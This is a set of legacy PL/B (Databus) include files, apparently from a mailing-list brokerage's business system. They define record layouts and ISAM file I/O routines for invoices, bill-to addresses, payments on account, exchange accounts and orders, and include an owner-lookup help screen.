MinxFill Dim 1 7-7
MinxMIN Dim 6 8-13 Min #
minXFIll2 Dim 7 14-20
LISTEND
<file_sep>/include/MDCTXTDD.INC
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_MTXT
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
.Patch 1.1 18 March 2008 DLH add Aam
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDCTXTDD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDCTXTDD - Owner
.MDCTXTDD - Text
......................................................
MTXTNAME INIT "MDC_TXT.Isi|NINS1:502"
MTXTNAME2 INIT "MDC_TXT2.Isi|NINS1:502"
MTXTNAME3 INIT "MDC_TXT.AAM|NINS1:502"
MTXTFLIST FileList
MTXTFILE IFILE Name="MDC_TXT.Isi|NINS1:502"
MTXTFILE2 IFILE Name="MDC_TXT2.Isi|NINS1:502"
MTXTFILE3 AFILE Fixed=62,Name="MDC_TXT.AAM|NINS1:502"
FileListEnd
MTXTSFILE FILE
.MTXTSFILE FILE Name="MDC_TXT.csv"
MTXTFLAG FORM 1
MTXTPATH FORM 1
MTXTFLD Dim 6
MTXTFLD2 Dim 10 card + Seq
MTXTFLD3 Dim 53 TExt plus key info
.
MTXTVARS LIST .for ease I am using Min's names
TXDCNO Dim 6 1-6 Card#
TGSQNO Form 4 7-10 Seq #
TXTTYP DIM 1 11-11 TYpe of text code
TXTLIN Dim 50 12-62 TEXT
ListEnd
MTXTVARS1 LIST .for ease I am using Min's names
CTXDCNO Dim 6 1-6 Card#
CTGSQNO dim 4 7-10 Seq #
CTXTTYP DIM 1 11-11 TYpe of text code
CTXTLIN Dim 50 TEXT
ListEnd
<file_sep>/include/ORDFDINV.INC
. *****************************************************************************
.
. FILE: NININV/CMPINV
. LENGTH: 256
. COMPRESS: NONE
. TYPE: ISAM
. KEY: ILR
.
. *****************************************************************************
.
INVOICE IFILE KEYL=6
.
IKEY DIM 6
.
ICD DIM 1 CODE
IST DIM 1 STATUS
IMN DIM 4 MAILER NUMBER
ILR DIM 6 LR NUMBER
IBT DIM 1 BILL-TO
IPT DIM 1 PAY-TO
ILI DIM 6 LIST OWNER INVOICE NUMBER
IP1 FORM 7 LIST OWNER AP
ICP FORM 2 COMMISSION PERCENT
IPC DIM 1 PAYABLE CODE
IQT FORM 7 QUANTITY SHIPPED
IPR FORM 5 PROCE/M
ICT DIM 3 CONTACT NUMBER
IIC DIM 1 INCOME CODE
ILO DIM 4 LIST OWNER NUMBER
IN2 DIM 6 CHECK NUMBER 2
IDJ DIM 1 WSJ PAYMENT CODE
IAC DIM 1 ADJUSTMENT CODE
IN1 DIM 6 CHECK NUMBER 1
IKD DIM 6 CHECK DATE
I90 DIM 1 OVER 90 DAY LETTER CODE
IMP FORM 7 MAILER PAYMENT RECEIVED
IDP DIM 6 DATE OF MAILER PAYMENT
IIN DIM 6 INVOICE NUMBER
IID DIM 6 INVOICE DATE
IC1 DIM 2 ADD CHRG CODE 1
IA1 DIM 12
IC2 DIM 2
IA2 DIM 12
IC3 DIM 2
IA3 DIM 12
IC4 DIM 2
IA4 DIM 12
IC5 DIM 2
IA5 DIM 12
IC6 DIM 2
IA6 DIM 12
IC7 DIM 2
IA7 DIM 12
IC8 DIM 2
IA8 DIM 12
IC9 DIM 2
IA9 DIM 12
IC0 DIM 2
IA0 DIM 12
IGP DIM 1 GUARANTEED PAYMENT CODE
IAR FORM 9 ACCOUNTS RECEIVABLE
ISC DIM 1 SALESMAN CODE
IP2 FORM 9 A/P 2
<file_sep>/include/Brptdd.inc
..............................................................................
.
. BrptDD INCLUSION
. Bankruptcy FILE DEFINITION
.
. FILE NAME : BankRuptcy
. REC LENGTH: 12 FIXED
. INDEX KEY : 1-6,7-12 (LR# ,INVOICE#)
.
.Patch 1.0 NEW July 2008
BrptLIST Filelist
BrptFILE IFILE KEYLEN=6,FIX=12,UNCOMP,Name="Bankruptcy.ISI|NINS1:502 "
BrptFLE2 IFILE KEYLEN=6,FIX=12,UNCOMP,Name="Bankruptcy2.ISI|NINS1:502 "
Filelistend
BrptFLSQ FILE
BrptNAME INIT "Bankruptcy.ISI|NINS1:502 "
BrptNAMESEQ INIT "Bankruptcy.Dat|NINS1:502 "
BrptFLD DIM 6
BrptFLD1 DIM 6
BrptFLAG FORM 1
BrptPath FORM 1 "1" by lr , "2" by inv inv not implemented yet
.
Brptvars list
BrptLR DIM 6 001-006 LR #
BrptINv DIM 6 007-012 INV #
listend
<file_sep>/include/NInvAcdIO.inc
...............................................................................
..
.. NINVACDIO INCLUSION
...............................................................................
.
. ENTRY POINT : NINVACDKEY
. REQUIRED : 'NINVACDFLD'
. RETURNED : INVOICE ACD RECORD
. DESCRIPTION : EXACT ISAM KEY READ
.
NINVACDKEY
BRANCH ninvACDFlag TO ninvACD1
CALL NINVOPEN
NINVAcd1 FILEPI 1;NINVACDFILE
READ NINVACDFILE,NINVACDFLD;INVACDVARS
return
...............................................................................
.
. ENTRY POINT : NINVTST
. REQUIRED : NINVFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
NInvAcdTST Branch NinvAcdFlag to NinvAcd2
CALL NInvAcdOPEN
NInvAcd2 FILEPI 1;NInvAcdFILE
READ NInvAcdFILE,NInvAcdFLD;str1;
RETURN
...............................................................................
.
. ENTRY POINT : NInvAcdKS
. REQUIRED : ''
. RETURNED : INVOICE RECORD
. DESCRIPTION : KEY SEQUENTIAL INVOICE FILE READ
.
NInvAcdKS Branch NinvAcdFlag to NINvAcd3
CALL NInvAcdOPEN
NInvAcd3 FILEPI 1;NInvAcdFILE
READKS NInvAcdFILE;INVAcdVARS
.
RETURN
...............................................................................
.
. ENTRY POINT : NInvAcdSEQ
. REQUIRED :
. RETURNED : INVOICE ACD RECORD
. DESCRIPTION : SEQUENTIAL INVOICE FILE READ
.
NInvAcdSEQ BRANCH NInvAcdFLAG TO NInvAcd4
CALL NInvAcdOPEN
NINVACD4 FILEPI 1;NInvAcdFILE
READ NInvAcdFILE,SEQ;INVACDVARS
RETURN
...............................................................................
.
. ENTRY POINT : NInvAcdWRT
. REQUIRED : 'NInvAcdFLD',
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT.
.
NInvAcdWRT bRANCH NinvAcdFlag to NinvAcd5
CALL NInvAcdOPEN
NInvAcd5 FILEPI 1;NInvAcdFILE
WRITE NInvAcdFILE,NInvAcdFLD;INVACDVARS
.
RETURN
.
...............................................................................
.
. ENTRY POINT : NInvAcdUPD
. REQUIRED : A PREVIOUS KEY READ,
. RETURNED :
. DESCRIPTION : KEY UPDATE INVOICE ACDFILE
.
NInvAcdUPD Branch NInvacdflag to NinvAcd6
CALL NInvAcdOPEN
NInvAcd6 FILEPI 1;NInvAcdFILE
UPDATE NInvAcdFILE;INVACDVARS
RETURN
...............................................................................
.
. ENTRY POINT : NInvAcdDEL
. REQUIRED : 'NInvAcdFLD'
. RETURNED :
. DESCRIPTION : PATH=1 DELETES TeXT & ALL KEYS.
.
NInvAcdDEL BRANCH NInvAcdFlag TO NInvAcd7
.
CALL NInvAcdOPEN
NInvAcd7 CALL NInvAcdtst ;ensure valid position in file
RETURN IF OVER
FILEPI 1;NInvAcdFILE
DELETE NInvAcdFILE,NInvAcdFLD
RETURN
.
...............................................................................
.
. ENTRY POINT : NInvAcdOPEN
. REQUIRED :
. RETURNED : 'NInvAcdFLAG' SET TO 1 if opened
. DESCRIPTION : OPEN NIN INVOICE ACD FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NInvAcdOPEN
TRAP NInvAcdGONE IF IO
BRANCH NInvAcdFLAG OF NInvAcdCLOS,NInvAcdCLOS
GOTO NInvAcdOPN1
NInvAcdCLOS CLOSE NInvAcdFILE
NInvAcdOPN1 OPEN NInvAcdFILE,NInvAcdNAME
TRAPCLR IO
TRAP IOmssg GIVING ERROR IF IO
MOVE c1 TO NInvAcdFLAG
RETURN
................................................................................
NInvAcdGONE MOVE NInvAcdNAME TO FILENAME
CALL FILEGONE
.
................................................................................
NInvAcdRecClear
FOR AcdRecCount,"1","15"
Clear NInvAcdRec(AcdRecCount).NinvAcdNumRec
Clear NInvAcdRec(AcdRecCount).NinvAcdCodeRec
MOve c0 to NInvAcdRec(AcdRecCount).NinvAcdRateRec
MOve c0 to NInvAcdRec(AcdRecCount).NInvAcdPercRec
MOve c0 to NInvAcdRec(AcdRecCount).NInvAcdQtyRec
Clear NInvAcdRec(AcdRecCount).NINVAcdANINCDRec
Clear NInvAcdRec(AcdRecCount).NINvAcdAextcdRec
Clear NInvAcdRec(AcdRecCount).NinvAcdRateTRec
Clear NInvAcdRec(AcdRecCount).NINvAcdTotalRec
Clear NInvAcdRec(AcdRecCount).NINvAcdDescRec
repeat
Return
................................................................................
.NInvAcdRecLoad - load up all ACD records
.Requires - prepositioning in the Isam file so readks can be used
. - NinvAcdRec empty see clear routine above
. - and valid Invnum value from invoice read
NInvAcdRecLoad
FOR AcdRecCount,"1","15"
call NInvAcdKS
If over
Break
endif
IF (invnum = NInvAcdINV)
MOve NinvAcdNum to NInvAcdRec(AcdRecCount).NinvAcdNumRec
MOve NinvAcdCode to NInvAcdRec(AcdRecCount).NinvAcdCodeRec
MOve NinvAcdRate to NInvAcdRec(AcdRecCount).NinvAcdRateRec
MOve NInvAcdPerc to NInvAcdRec(AcdRecCount).NInvAcdPercRec
MOve NINVAcdANINCD to NInvAcdRec(AcdRecCount).NINVAcdANINCDRec
.begin patch 1.3
MOve NINVAcdQty to NInvAcdRec(AcdRecCount).NINVAcdQtyRec
if (AdjCalcFlag = YES) .calling from adjustment program with change in qty in N9
.if adjustment calc we forced new qty to qtybild
.DO NOT RESAVE RECORD WITH THESE Values in the table
MOve QtyBild to NInvAcdRec(AcdRecCount).NINVAcdQtyRec
Else
MOve NINVAcdQty to NInvAcdRec(AcdRecCount).NINVAcdQtyRec
endif
.end patch 1.3
MOve NinvAcdAextcd to NInvAcdRec(AcdRecCount).NinvAcdAextcdRec
Move NINvAcdRateT to NInvAcdRec(AcdRecCount).NinvAcdRateTRec
else
break
endif
repeat
NInvAcdRecLoadExit
return
................................................................................
<file_sep>/include/nxngdd.inc
;* NXNGDD/INC.
;* *****************************************************************************
;* NAMES IN THE NEWS MASTER EXCHANGE ACCOUNT FILE.
;* *****************************************************************************
;.
;. FILE: NINXNUM
;. LENGTH: 30
;.COMPRESS: NONE
;. TYPE: AIM
;. KEY: ACCKEY MLR1,MLR2 1-6,7-12
;...............................................................................
.Need to add 100 byte note field
;. revision:
...08 February 2010 DLH NXNGLock
;..13Jul98 DLH ADD flag AND DATE FOR purpose of allowing ACCOUNT Inactivation.
. Patch 1.1 31JAN05 ASH Increased Mailer fields
;.
;...............................................................................
;.
.START PATCH 1.1 REPLACED LOGIC
.;NXNGNAME INIT "NINXNUM "
.NXNGNAME INIT "NINXNUM.AAM|20.20.30.103:502"
.NXNGFLD1 DIM 7
.NXNGFLD2 DIM 7
.NXNGFILE AFILE FIXED=22
.NXNGFLAG FORM 1
.ACKEY DIM 8 HOLDS ACCKEY FOR CHECK AFTER READ.
.. .............................................................................
..
.. ..ACCOUNT MASTER
..
.ACCKEY DIM 8 1-8 MAILER #1/MAILER #2.
.;.BLANK08 DIM 8 9-16 NOT USED.
.nxngdate DIM 8 9-16 DATE inactivated ccyymmdd
.ENTRY FORM 5 17-21 ENTRY NUMBER. detail entry number for most current detail record
.Flag DIM 1 22-22 " "=normal, "I" = inactive
.;.FLAG DIM 1 22-22 NOT USED.
.................................................
NXNGNAME INIT "NINXNUM.AAM|NINS1:502"
NXNGFLD1 DIM 9
NXNGFLD2 DIM 9
NXNGFILE AFILE FIXED=30
NXNGFLAG FORM 1
NXNGLock FORM 1
ACKEY DIM 12 HOLDS ACCKEY FOR CHECK AFTER READ.
. .............................................................................
.
. ..ACCOUNT MASTER
.
ACCKEY DIM 12 1-12 MAILER #1/MAILER #2.
nxngdate DIM 8 13-20 DATE inactivated ccyymmdd
ENTRY FORM 5 21-25 ENTRY NUMBER. detail entry number for most current detail record
Flag DIM 1 26-26 " "=normal, "I" = inactive
xngfiller dim 4 27-30
.END PATCH 1.1 REPLACED LOGIC
<file_sep>/include/NBILDD.INC
..............................................................................
.
. NBILDD INCLUSION
. NIN BILL-TO FILE DEFINITION
.
. FILE NAME : NINBIL
. REC LENGTH: 130 FIXED
. INDEX KEY : 2-9 (4 POSITION MLR#, 3 POSITION CONTACT#, 1 POSITION BILL#)
.
..............................................................................
.
NBILFILE IFILE KEYLEN=8,FIX=130
IFNZ PC
NBILFIL2 AFILE FIX=130
XIF
IFZ PC
.NBILFIL2 AFILE 51,1,,FIX=130
NBILFIL2 AFILE FIX=130
XIF
NBILFLE3 FILE FIXED=130
NBILNAME INIT "NINBIL "
NBILFLD DIM 8
NBILFLAG FORM 1
NBILFLD1 DIM 53
NBILFLG2 FORM 1
NBILFLG3 FORM 1
NBILPATH FORM 1
.
BILFIL1 DIM 1 001-001 FILLER
BILMLR DIM 4 002-005 MAILER COMPANY NUMBER
BILCNT DIM 3 006-008 MAILER CONTACT NUMBER
BILCODE DIM 1 009-009 BILL-TO NUMBER
BILNAME DIM 25 010-034 CONTACT NAME
BILCOMP DIM 25 035-059 COMPANY NAME
BILADDR DIM 25 060-084 ADDRESS
BILCITY DIM 15 085-099 CITY
BILSTATE DIM 2 100-101 STATE
BILZIP DIM 10 102-111 ZIP CODE
BILUSER DIM 10 112-121 LAST USER TO MODIFY
BILRVDTE DIM 6 122-127 REVISED DATE
BILFIL3 DIM 3 128-130 FILLER
.
..............................................................................
<file_sep>/include/NPGEIO.INC
..............................................................................
.
. NPGEIO INCLUSION
. NIN PAGE.SRT FILE I/O ROUTINES
.
. FILE NAME : PAGE.SRT
. REC LENGTH: 9 VAR
. INDEX KEY : 1-9 (6 BYTE LIST NUMBER + 3 BYTE RECORD #)
.
..............................................................................
.
. ENTRY POINT : NPGEKEY
. REQUIRED : 'NPGEFLD'
. RETURNED : PAGE.SRT RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NPGEKEY
BRANCH NPGEFLG2,NPGE1
CALL NPGEOPN2
NPGE1
trap IOMssg giving Error if IO
. FILEPI 1;NPGEFLE2
READ NPGEFLE2,NPGEFLD;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGETST
. REQUIRED : NPGEFLD
. RETURNED :
. DESCRIPTION : TEST KEY
.
NPGETST
BRANCH NPGEFLG2,NPGE2
CALL NPGEOPN2
NPGE2
trap IOMssg giving Error if IO
. FILEPI 1;NPGEFLE2
READ NPGEFLE2,NPGEFLD;;
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEKS
. REQUIRED :
. RETURNED : PAGE.SRT RECORD
. DESCRIPTION : KEY SEQUENTIAL PAGE.SRT FILE READ
.
NPGEKS
BRANCH NPGEFLG2,NPGE3
CALL NPGEOPN2
NPGE3
trap IOMssg giving Error if IO
. FILEPI 1;NPGEFLE2
READKS NPGEFLE2;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGESEQ
. REQUIRED :
. RETURNED : PAGE.SRT RECORD
. DESCRIPTION : SEQUENTIAL PAGE.SRT FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NPGESEQ
BRANCH NPGEFLAG,NPGE4
CALL NPGEOPEN
NPGE4
trap IOMssg giving Error if IO
. FILEPI 1;NPGEFILE
READ NPGEFILE,SEQ;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEWRT
. REQUIRED : 'NPGEFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
NPGEWRT
BRANCH NPGEFLG2,NPGE5
CALL NPGEOPN2
NPGE5
trap IOMssg giving Error if IO
FILEPI 1;NPGEFLE2
WRITE NPGEFLE2;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE RECORD NUMBER FILE
.
NPGEUPD
BRANCH NPGEFLG2,NPGE6
CALL NPGEOPN2
NPGE6
trap IOMssg giving Error if IO
FILEPI 1;NPGEFLE2
UPDATE NPGEFLE2;NPGEVARS
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEDEL
. REQUIRED : 'NPGEFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
NPGEDEL
BRANCH NPGEFLG2,NPGE7
CALL NPGEOPN2
NPGE7
trap IOMssg giving Error if IO
FILEPI 1;NPGEFLE2
DELETE NPGEFLE2
trapclr IO
RETURN
..............................................................................
.
. ENTRY POINT : NPGEEOF
. REQUIRED :
. RETURNED :
. DESCRIPTION : SETS RECORD POINTER TO END OF FILE
.
NPGEEOF
WEOF NPGEFILE,SEQEOF
RETURN
...............................................................................
.
. ENTRY POINT : NPGEOPN2
. REQUIRED : 'NPGEFLG2'
. RETURNED : 'NPGEFLG2' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN PAGE.SRT FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NPGEOPN2
TRAP NPGEGONE giving Error if IO
OPEN NPGEFLE2,NPGENAME
trapclr IO
MOVE C1,NPGEFLG2
RETURN
...............................................................................
.
. ENTRY POINT : NPGEOPEN
. REQUIRED : 'NPGEFLAG'
. RETURNED : 'NPGEFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN PAGE.SRT FILE FOR SEQUENTIAL PROCESSING
.
.
NPGEOPEN
TRAP NPGEGONE giving Error if IO
OPEN NPGEFILE,NPGENAME
MOVE C1,NPGEFLAG
trapclr IO
RETURN
.
NPGEGONE
MOVE NPGENAME,FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/NADJCLIO.inc
; Last change: JS 6 Oct 1999 12:30 pm
..............................................................................
.
. NADJCLIO INCLUSION
. NIN ADJUSTMENT APPLICATION ROUTINE
.
. APPLIES ADJUSTMENT AMOUNTS TO COMPUTED AMOUNTS FROM THE NINVCALC
. ROUTINE IN THE NINVCLIO INCLUSION.
.
..............................................................................
.
NADJCALC
. MOVE ASRECADJ TO CVTFLD
. display *p01:25,"adjar"
. CALL CVT
MOVE ARAMT TO ARJ
ADD asrecadj TO ARamt
. MOVE ARJ TO ARAMT
. ADD NUM102 TO ARWOPP
.
. MOVE ASPAYAD1 TO CVTFLD
. display *p01:25,"adjap1"
. CALL CVT
. MOVE APAMT TO AP1J
. ADD NUM102 TO AP1J
. MOVE AP1J TO APAMT
ADD aspayad1 TO APamt
.
. MOVE ASPAYAD2 TO CVTFLD
. display *p01:25,"adjap2"
. CALL CVT
. MOVE AP2AMT TO AP2J
. ADD NUM102 TO AP2J
. MOVE AP2J TO AP2AMT
ADD aspayad2 TO AP2amt
.begin PLI Patch
. add ASNININC,NInInc
add ASXninc,XNIncamt
ADD aspayad3 TO AP3amt
.end PLI Patch
.
. MOVE ASLRINC TO CVTFLD
. display *p01:25,"adjlrinc"
. CALL CVT
ADD aslrinc TO LRINC
.
. MOVE ADJSTAX TO CVTFLD
. display *p01:25,"adjstax"
. CALL CVT
. ADD NUM102 TO STAX
. ADD NUM102 TO TAXES
..
. MOVE ADJCTAX TO CVTFLD
.| display *p01:25,"adjctax"
.| CALL CVT
. ADD NUM102 TO CTAX
. ADD NUM102 TO TAXES
.
. MOVE ADJPOST TO CVTFLD
. display *p01:25,"adjpost"
. CALL CVT
. ADD NUM102 TO POST
.
RETURN
.
CVT
. ENDSET CVTFLD CHECK LAST BYTE.
. RESET MPCHARS
. SCAN CVTFLD IN MPCHARS IS IT A MINUSOVRPNCH?
. GOTO CVTMP IF EQUAL YES.
. RESET CVTFLD NO.
. TYPE CVTFLD CHECK NUMERIC VALIDITY.
. GOTO CVTOK IF EQUAL ITS OK.
FORMERR
. DISPLAY *P01:24,*EL,*B,"Format error in NADJCALC. ":
. "CVTFLD=",CVTFLD,*W9
. MOVE B10 TO CVTFLD
. RETURN
CVTMP
. REPLACE MPCHANGE IN CVTFLD CHANGE MP TO NUMBER.
. RESET CVTFLD
. TYPE CVTFLD VALID NUMERIC?
. GOTO FORMERR IF NOT EQUAL NO.
MOVE CVTFLD TO NUM10 MOVE INTO NUMERIC.
MULTIPLY "-1" BY NUM10 CHANGE TO MINUS.
MOVE NUM10 TO CVTFLD MOVE BACK TO DIM.
CVTOK MOVE CVTFLD TO NUM102
MULTIPLY ".01" BY NUM102
RETURN
<file_sep>/include/Ownhelp.inc
; Last change: AL 2 Jun 1999 8:04 am
ownhelp DISPLAY *SETSWALL 12:24:40:80;
KEYIN *P1:1,*ES:
*P1:12,*EL,"I WILL HELP YOU FIND THE OWNER NUMBER",*R:
*P1:12,*EL,"THAT YOU WANT":
*R,*P1:12
KEYOWN KEYIN *P1:1,*ES,"TYPE IN OWNER NAME : ":
*P1:2,*T60,OWNOCPY
KEYIN *P1:2,*DV,OWNOCPY,*P1:3,"OK ? ",*T60,str1:
*P1:3,*EL;
CMATCH NO TO str1
GOTO KEYOWN IF EQUAL
CMATCH B1 TO OWNOCPY
GOTO NTENOf IF EQUAL
GOTO NTENOf IF EOS
move "01F" to akey1
PACK NOWNFLD2 FROM AKEY1,OWNOCPY,QUES
OWNEADA MATCH "01F" TO AKEY1 *FREE FLOAT SEARCH?
CALL CHKKEY IF EQUAL *YES, CHECK KEY LENGTH
MOVE "*****NO RECORD FOUND*****" TO OWNOCPY
CALL NOWNAIM
GOTO OWNAEXIT IF OVER
GOTO DISOWNA
CHKKEY MOVELPTR NOWNFLD2 TO KEYCOUNT
COMPARE C10 TO KEYCOUNT
GOTO ntenof IF LESS *NOT ENOUGH INFO, LET THEM KNOW
RETURN *OK, RETURN
OWNEADA1 MOVE "*****NO RECORD FOUND*****" TO OWNOCPY
CALL NOWNKG
GOTO OWNAEXIT IF OVER
GOTO DISOWNA
OWNAEXIT
CALL NORECORD
OWNAEXT1 DISPLAY *P1:1,*ES,*RESETSW:
*P20:21,*HON,"ENTER TO EXIT,":
" or (?) FOR HELP",*HOFF;
GOTO DISOWN
.
DISOWNA
clear npayfld
PACK npayfld FROM ownlon,c0
CALL npaykey
IF over
DISPLAY *P1:09,*EL,"##",OWNLON," ":
*P1:10,OWNLONM,*P1:11,OWNOCPY
KEYIN *P1:13,"TAP ENTER TO CONTINUE, (*) TO END",*T254,str1;
CMATCH "*" TO str1
GOTO OWNAEXT1 IF EQUAL
GOTO OWNEADA1
else
DISPLAY *P1:09,*EL,"##",OWNLON," ":
*P1:10,OWNLONM,*P1:11,*red,OWNOCPY,*white
KEYIN *P1:13,"TAP ENTER TO CONTINUE, (*) TO END",*T254,str1;
CMATCH "*" TO str1
GOTO OWNAEXT1 IF EQUAL
GOTO OWNEADA1
endif
DISOWN
KEYIN *P45:09,*DV,OWNOCPY,*P75:09,"OK?",*T60,str1;
CMATCH NO,str1
GOTO ownhelp IF EQUAL
CMATCH YES,str1
return IF EQUAL
GOTO DISOWN
.
NORECORD MOVE "*****NO RECORD FOUND*****" TO OWNOCPY
DISPLAY *P1:14,*EL,OWNOCPY,*W2,*B,*P1:13,*EL
RETURN
.
ntenof NORETURN
.
NOGOOD
DISPLAY *P1:24,*HON,*EL,*B,"NOT ENOUGH INFORMATION TO SEARCH ON!!!":
*RESETSW:
*P20:21,*HON,"ENTER TO EXIT,":
" or (?) FOR HELP",*HOFF;
PAUSE "3"
return
<file_sep>/include/nmoadd.inc
* *****************************************************************************
* NmoaDD.INC CREATED 30APR92 DLH
* *****************************************************************************
.
.14 Oct 2010 add reason code 23
.move comments to notes so room for COmpany id
.22Dec2003 Expanded notes into seperate file DLH
.See MoaNotesdd.inc
. 28dec95 on write use actual variables and *zf on brk number. DLh
.10mar95 increase control number to 3 bytes
.17mar94 added brknum
.12may94 added new file by brk/mlr
.
. FILE: NINMOA - DETAIL RECORD FILE.
. LENGTH: 128
.COMPRESS: NONE
. TYPE: ISAM
. KEYS: 1)MLR,ENTRY ? mlr,cnt 1-7
. 2)TRANSNUM 115-121
. 3)brk,mlr 122-125,1-4
. 4)LRNUM 30-35
.
.NMOAFILE IFILE KEYLEN=7,FIXED=119 .mlr/cnt
.NMOAFLE2 IFILE KEYLEN=7,FIXED=119 .transnum
.NMOAFLE3 FILE FIXED=119 .seq
.nmoafle4 ifile keylen=8,fixed=119 .brk/mlr
.nmoafle5 ifile keylen=6,fixed=119 .lrn
NMOAFILE IFILE KEYLEN=7,FIXED=128 .mlr/cnt
NMOAFLE2 IFILE KEYLEN=7,FIXED=128 .transnum
NMOAFLE3 FILE FIXED=128 .seq
nmoafle4 ifile keylen=8,fixed=128 .brk/mlr
nmoafle5 ifile keylen=6,fixed=128 .lrn
NMOANAME INIT "NINMOA "
.START PATCH 01/20/2005 ASH REPLACED LOGIC
.NMOANME1 INIT "\\NINS1\e\data\index\NINMOA "
.NMOANME2 INIT "\\NINS1\e\data\index\NINMOA2 "
.NMOANME3 INIT "\\NINS1\e\data\index\NINMOA "
.NMOANME4 INIT "\\NINS1\e\data\index\NINMOA3 "
.NMOANME5 INIT "\\NINS1\e\data\index\NINMOA4 "
NMOANME1 INIT "NINMOA "
NMOANME2 INIT "NINMOA2 "
NMOANME3 INIT "NINMOA "
NMOANME4 INIT "NINMOA3 "
NMOANME5 INIT "NINMOA4 "
.END PATCH 01/20/2005 ASH REPLACED LOGIC
NMOAPATH FORM 1 1=mlr/cnt,2=transnum,3=seq,4=brk/mlr
. 5=lrn
NMOAFLAG FORM 1
NMOAFLG2 FORM 1
NMOAFLG3 FORM 1
NMOAFLG4 FORM 1
NMOAFLG5 FORM 1
NMOAFLD DIM 7
NMOAFLD4 DIM 8
NMOAFLD5 DIM 6
NMOALOCK FORM 1 0 or 1=File locks, 2= Record locks, 3=no locks
.
.DETAIL RECORD.
...............
moavars list
MLR DIM 4 1-4 CLIENT NUMBER "KEY".
MCNT DIM 3 5-7 MAILER CONTACT NUMBER.
ENTRY FORM 4 8-11 ENTRY NUMBER "KEY".
MBILLTO DIM 1 12-12 MAILER BILL-TO NUMBER.
.TRANDATE DIM 6 13-18 DATE APPLIED/RECEIVED.
TRANDATE DIM 8 13-20 DATE APPLIED/RECEIVED. CCYYMMDD
CONTROL DIM 3 21-23 CONTROL NUMBER.
INVOICE DIM 6 24-29 INVOICE NUMBER.
LRNUM DIM 6 30-35 LIST RENTAL NUMBER.
.INVDATE DIM 6 34-39 INVOICE DATE.
INVDATE DIM 8 36-43 INVOICE DATE. ccyymmdd
ONAMOUNT FORM 7.2 44-53 AMOUNT OUT
.RECDATE DIM 6 50-55 DATE RECORD ENTERED.
RECDATE DIM 8 54-61 DATE RECORD ENTERED. ccyymmdd
INAMOUNT FORM 5.2 62-69 AMOUNT IN
MoaCOmp Dim 1 70-70 'P' if Pacific Lists
MoaFIll Dim 29 71-99
.ONACOM DIM 30 70-99 COMMENTS
REASON FORM 2 100-101 REASON CODE
LIST DIM 6 102-107 LIST NUMBER TO BE APPLIED TO.
CHECKNUM DIM 7 108-114 CHECK NUMBER
TRANSNUM DIM 7 115-121 RECORD ID NUMBER. "KEY".
NMOABRK dim 4 122-125 consultant/broker #. 3/17/94 dlh "key"
NMOAINIT DIM 3 126-128 TYPIST INITIALS .New field
listend
.
.MOA REASON TABLE.
.............
REAS1 INIT "OVERPAYMENT"
REAS2 INIT "UNIDENT. PAYMNT"
REAS3 INIT "INV. CANCELLED"
REAS4 INIT "MISSING"
REAS5 INIT "REFUND"
REAS6 INIT "UNUSED CREDIT"
REAS7 INIT "USING CREDIT"
REAS8 INIT "TRF ENTRY"
REAS9 INIT "ADV PAY POLITIC"
REAS10 INIT "ADV PAY NEW MLR"
REAS11 INIT "PAYMENT ON A/C"
REAS12 INIT "FROM BOOKS"
REAS13 INIT "DUP. PAYMENT"
REAS14 INIT "WRITEOFF"
REAS15 INIT "Short pay"
REAS16 INIT "Canc Check"
REAS17 INIT "Transfer"
REAS18 INIT "Prepayment"
REAS19 INIT "Escrow"
REAS20 INIT "M O A"
REAS21 INIT "Contra"
.begin patch 3.41 Nona0001
REAS22 INIT "LO Income check"
REAS23 INIT "NIN-Discnt/Fees"
.end patch 3.41 Nona0001
REAS99 INIT "ENTRY CORRECTN"
RDESC DIM 15
.
<file_sep>/DEVELOP/Includes - why/nordddash.inc
..............................................................................
.
. NORDDD INCLUSION
. NIN ORDER FILE DEFINITION
.
. FILE NAME : NINORD
. REC LENGTH: 408 FIXED .WAS 294
. INDEX KEY : (1) 7-12 (LR#)
. (2)303-306,7-12 broker/consultant#+lr#
.AIMDEX KEYS: (1) 3-6 (MAILER#)
. (2) 16-21 (LIST#)
. (3) 26-37 (PO#)
. (4) 303-306 (broker/consultant#)
. (5) 22-25 (LIST OWNER)
. (6) 52-63 (MAILER KEY)
. (7) 198-199 (CONTACT)
.............................................................................
.
NORDNAME DIM 28
NORDNME1 INIT "NINORD.ISI|20.20.30.103:502"
NORDNME2 INIT "NINORD.AAM|20.20.30.103:502"
nordnme3 init "NINORDB"
nordnme4 init "NINORDC.ISI|20.20.30.103:502"
NORDFILE IFILE KEYLEN=6,FIXED=408,NODUPLICATES
NORDFLE2 AFILE FIXED=408
NORDFLE4 IFILE KEYLEN=6,FIXED=408
NORDFLD DIM 6
NORDFLD1 DIM 9 nordfle2 AIM KEY 1 MLR
